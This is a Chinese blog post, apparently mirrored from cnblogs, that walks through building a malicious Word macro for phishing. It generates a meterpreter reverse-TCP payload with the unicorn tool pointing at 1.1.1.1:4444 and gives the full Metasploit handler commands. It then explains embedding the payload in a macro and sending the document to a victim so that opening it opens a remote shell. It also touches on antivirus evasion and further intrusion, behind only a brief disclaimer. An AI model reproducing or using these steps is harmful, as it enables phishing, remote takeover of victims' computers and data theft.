zoukankan      html  css  js  c++  java
  • Windows宏病毒利用

    背景:

    最近忙的飞起,各种事情,不想吐槽,因为某些事情,还吃了口屎,啧啧啧。。。。。

    常见的钓鱼,社工基本技术都是这种,什么鱼叉,水坑,社工,投毒之类的,APT 攻击惯用伎俩。

    那么今天主要利用Windows office 宏进行远程攻击。

    环境:

    kail Linux 2018 xface

    Windows 10 home  office 2016

    直接上操作:

    kail linux 

    # git clone https://github.com/trustedsec/unicorn.git

    此工具使用具体看帮助信息,这里不多说明,也可以去Git上查看

    生成payload:

    # python unicorn.py windows/meterpreter/reverse_tcp 1.1.1.1 4444 macro

    会生成:

    powershell_attack.txt #office宏payload

    unicorn.rc #msf使用

    两个文件

    启动msfconsole

    use multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 1.1.1.1
    set LPORT 4444
    set ExitOnSession false
    set AutoVerifySession false
    set AutoSystemInfo false
    set AutoLoadStdapi false
    exploit -j

    靶机Windows10 主机上生成带有宏病毒的office Word文档

    记得打开开发者选项,输入正文内容

    点击宏,输入宏名称,然后点击新建

    这里将生成的payload 复制进去

    然后点击保存,导出文档为97-2003 文档格式

    将文档发给受害者,打开文档就直接上线。

    okay msf这边已经上线

    在这里可能有人可能会问题,那报毒怎么办,那么我杀毒检测看看,看看稳不稳:

    后面就是进程迁移,后持续渗透,内网深入渗透了。。。。

    请勿使用非法用途,否则后果自负。。。。。

    备注:生成的payload需要修改下,否则会导致不运行或者运行完成后退出。。。。

  • 相关阅读:
    sudo 临时切换用户和环境变量的传递
    递归复杂度算法如何计算草稿
    Mac下设计全局环境变量
    Golang http 超时设置方法
    go get github竟然区分大小写
    通过远程终端后台运行程序
    打开华为手机的logcat
    Golang的锁和线程安全的Map
    PL/SQL语句块基本语法(ORACLE存储过程,函数,包,游标) (转)
    C# 文件操作把结果保存到文件里
  • 原文地址:https://www.cnblogs.com/hack404/p/11876059.html
Copyright © 2011-2022 走看看